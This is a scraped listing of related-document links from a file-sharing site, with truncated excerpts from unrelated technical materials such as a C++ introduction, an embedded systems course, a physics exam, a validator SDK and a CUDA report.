More informationCHAPTER 1.2 INTRODUCTION TO C++ PROGRAMMING. Dr. Shady Yehia Elmashad
CHAPTER 1.2 INTRODUCTION TO C++ PROGRAMMING Dr. Shady Yehia Elmashad Outline 1. Introduction to C++ Programming 2. Comment 3. Variables and Constants 4. Basic C++ Data Types 5. Simple Program: Printing
More informationEMBEDDED SYSTEMS PROGRAMMING Language Basics
EMBEDDED SYSTEMS PROGRAMMING 2014-15 Language Basics (PROGRAMMING) LANGUAGES "The tower of Babel" by Pieter Bruegel the Elder Kunsthistorisches Museum, Vienna ABOUT THE LANGUAGES C (1972) Designed to replace
More informationPhysics 234: Computational Physics
Physics 234: Computational Physics In-class Midterm Exam Friday, February 12, 2010 Student s Name: Fill-in-the-blank and multiple choice questions (20 points) Mark your answers on the exam sheet in blue
More informationuvi ... Universal Validator Interface Software Developers Kit Revision /29/04 Happ Controls
Happ Controls 106 Garlisch Drive Elk Grove, IL 60007 Tel: 888-289-4277 / 847-593-6130 Fax: 847-593-6137 www.happcontrols.com uvi Universal Validator Interface Software Developers Kit.......... Revision
More informationTR On Using Multiple CPU Threads to Manage Multiple GPUs under CUDA
TR-2008-04 On Using Multiple CPU Threads to Manage Multiple GPUs under CUDA Hammad Mazhar Simulation Based Engineering Lab University of Wisconsin Madison August 1, 2008 Abstract Presented here is a short
More informationComplexity. Objective: Check the feasibility of using an algorithm for solving a particular class of problem
Complexity Objective: Check the feasibility of using an algorithm for solving a particular class of problem Complexity Objective: Check the feasibility of using an algorithm for solving a particular class
More informationToday s class. Finish review of C Process description and control. Informationsteknologi. Tuesday, September 18, 2007
Today s class Finish review of C Process description and control Computer Systems/Operating Systems - Class 6 1 Finish review of C Review in class exercise 3 #1: game cptr is 5004 #2: The value of c is
More information